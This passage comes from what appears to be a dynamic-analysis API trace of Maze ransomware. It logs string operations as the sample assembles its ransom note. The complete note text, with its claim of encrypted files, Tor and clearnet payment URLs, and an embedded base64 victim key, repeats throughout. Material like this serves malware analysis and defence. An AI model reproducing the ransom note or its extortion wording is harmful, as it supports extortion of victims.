KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n") returned="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n" [0178.540] VirtualFree (lpAddress=0x5d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.540] lstrlenW (lpString="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n") returned 2053 [0178.540] lstrlenW (lpString="9cda09f29c354b42") returned 16 [0178.540] StrStrW (lpFirst="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n", lpSrch="%USERID%") returned 0x0 [0178.540] lstrlenW (lpString="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n") returned 2053 [0178.540] lstrlenW (lpString="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") returned 2564 [0178.540] StrStrW (lpFirst="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n", lpSrch="%base64key%") returned="%base64key%\r\n---END MAZE KEY---\r\n\r\n" [0178.540] VirtualAlloc (lpAddress=0x0, dwSize=0x2416, flAllocationType=0x3000, flProtect=0x4) returned 0x5d0000 [0178.541] lstrcpynW (in: lpString1=0x5d0000, lpString2="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n", iMaxLength=2019 | out: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n") returned="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n" [0178.541] lstrcatW (in: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n", lpString2="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" | out: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n1ujMBzMtWcg3j3csHFRTbG1OlFICZ2fF0SGosgxjcchu1MDIMly7CBAb4B+bIIeacNA7gqH05ksgSzA1rko+JhzG1aEZOxLV3NYO5/EiAH4Kdwgx07IijKtjA5jxSXRm8yHP9wQ2l9ZNWGniP+Ni5QI0KZKq+Nu+Lm0xfW6xZlgQuJ7gAcARahMWVmOt0CQfcxWXZPx/vAHewaxheaoOi+B6+PBHxvXhL37U/Qpa+KS3uA4mtoYGeQ0pBJhdLI94GnMqjwxH8okQgxbR/diYd4HmSXPVJnAH45cWUxlwWHi17tPcZsNoupdks4kuppSnc4mjJ6fxGCs8Yh9IF4iPQzkJ9479qQUbSlPvw0Q4Wy2ufAlaEdKQKylpinkoykAH9haZuRzjQeLAZ6z2bE/kg2jDl2HXUp7vC3sp2c6dGQR7W7rNOyxIqOYr+K1y7k8OeCfjzkOrSwkdhjPPMdyRpM//AZ/Klo7xajKVRqEDd+HWQvQfdxutG90dsyaFsz4cOThvcqAKiko93ph1UlLusFoSDSoATUqhYbucHlsFyl3KiMgnENT232fraqUcgUPv6WMMwK3L/oU1bQR8gzPDrP9mfq4rpOdVr5Mm5OlL0BqKE9uG4eB8LL8PRqSXCn6xSnvXRelGPBV2M4iWCQ6fNdHlDBb8eYoGdWrmTf5ceGztp8iWOwAvIdTE0VDE/iZPwhbwFA9H58EEZcER9eZDOyPo57GhGD0QKkZrjkakRe+M+zXqRnLMe/FjU3mmx8v1BW1d2ETKGfw+KmeVPDVs36/oWXMh8GDvndaaM7+0zxA4kaLihe2VHwwZraBNH2A7P1jvFMqTaLzSRDyh4BDtHyp0RSyOARjaK9bnyzFqXldxL91VUtNBItsKZvO44rK/c2ENr+RO0a0djv1NsTIzqk0QVttVeMYWV/Kphx5aGKfv6c3RexlncEyJ+q5fabIcuE+yrqYk+AMMC1HHZAZQnJt8JEc7ObLZCFX7GMH8uUqRt4VY6rCTsVCC5Si4/UBR6LLjKBLHXuGVwLpUOrsJjj/3zZJHM08ezZC/uCMZKx6/8LQFz47DFYs3/kG0RvYzxMZcXTMVCZ91MhUfEYtxIaTWQ4/C4f9cgIhnBLbKZcXjBk76LWjAWhA/yRD2EyKi2iFcryMv+U3sVCaXhPjMNjB32Vga3NBtJ4lFrkr2j8D7lwXTJq7F6pqPAP3oRTNmH/em4